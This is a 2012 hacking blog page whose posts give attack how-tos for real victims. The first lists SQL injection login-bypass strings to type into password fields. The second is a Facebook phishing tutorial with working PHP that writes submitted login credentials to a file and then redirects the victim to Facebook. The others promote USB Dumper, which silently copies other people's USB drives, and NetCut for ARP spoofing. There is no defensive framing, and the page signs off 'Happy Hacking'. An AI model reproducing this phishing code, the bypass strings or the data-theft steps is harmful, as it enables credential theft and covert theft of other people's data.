Sunday, 23 September 2012

List of Sql Injection code strings



Here is the SQL injection strings..
Use them in the password field and see the magic... :)


' or 1=1--

" or 1=1--

or 1=1--

' or 'a'='a

" or "a"="a

') or ('a'='a

") or ("a"="a

Sql Injection.. How it works..

This Image explain everything... :)

Simple Phishing Technique/How to hack Facebook Account


Simple Phishing Technique/How to hack Facebook Account


Phishing is a technique in which hacker fools the victim by fake web page and steal his information. It is very easy to set up phishing on same computer. Using this you can  Following are the steps.
Step 1: Install Wamp Server
Step 2: Open “facebook.com”.  Save facebook login page.
Step 3: Open facebook saved html file in notepad or notepad++. Search for html tag “form” and change it’s attribute action with “login.php”. i.e. <form -----------action=”login.php”---->
Step 4: Create new file “login.php” and write following code in that file.
<?php
header("Location: http://www.facebook.com");
$handle = fopen("thepasses.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, " ");
}
fwrite($handle, "     ");
fclose($handle);
exit;
?>
Step 5: now copy “login.php”, “facebook.html” and folder  “facebook” to wamp server’s “www” folder.

Step 6: Start wamp server’s localhost page and open facebook.html page.

Step 7: Bookmark that page.and next time open wamp server and open that bookmarked page.

USB DATA STEALER


USB DATA STEALER

Now a days USB(Universal Serial Bus) has been important part of our life. Almost all kind of data sharing between friends and office colleagues is done using Pen Drive or similar kind of device. In corporate, important & confidential data sharing using USB is very unsecure. What if you insert Pen Drive into your friend’s laptop to give you family picnic photo to him and the same Pen Drive has very confidential data of your company. You believe that if you copy photos by your self to your friend’s computer and he had no chance to even see the content of you Pen Drive then you are wrong…!!!!
USB DATA STEALERs are great tools for hackers who want to steal data from Pen Drive inserted by others into your system. This program work in background and the naïve person can not recognize its presence. It is not detected by any Anti-Virus software as a threat to system. All you need to do is start this software and it will run in background. As soon as any person inserts Pen Drive into your system, this program will start copying all the data from the Pen Drive without notice. Most tools are freeware and available on internet. So if have no intention to share something then don’t keep it in Pen Drive.

TOOL: USB Dumper

v  USB Dumper is an application that runs a background process which copies the file from any USB device connected to your system silently.
v  It is very simple and not detectable as security threat.
v  The other person cannot recognize that his data are stolen in front of his eyes.

Screen Shot of the USB Dumper v2.2

Monday, 17 September 2012

NETCUT an amazing tool for arp spoofing

You have your own wireless router at you home..You friend come to your home and use your internet that you don't want. How will you stop him. Saying no is not decent way.
Well, You have an option...
An amazing network tool.


Using this tool you can scan you network. Discover who is using your network. You can disconnect unwanted machines from your network. This tool works on ARP spoofing..

Netcut can help you figure out exactly who is on your network by IP Address, Device Name or MAC address. Designed for use in both the home and the office, netcut can identify which devices are on the network including iPhones, iPads, Mobile Phones and more.
This program can also clone mac addresses of any device on your network to your own adapter. Netcut can also enable and disable any devide on the network and protect computers from ARP spoof attacks.
Very simple to use, netcut will help you administer your network based on the ARP protocol.
Easy to use: One click to Protect user Computer Function! No one in the network can cut you off with ARP spoof technology anymore .


Download NETCUT:

HAPPY HACKING... :)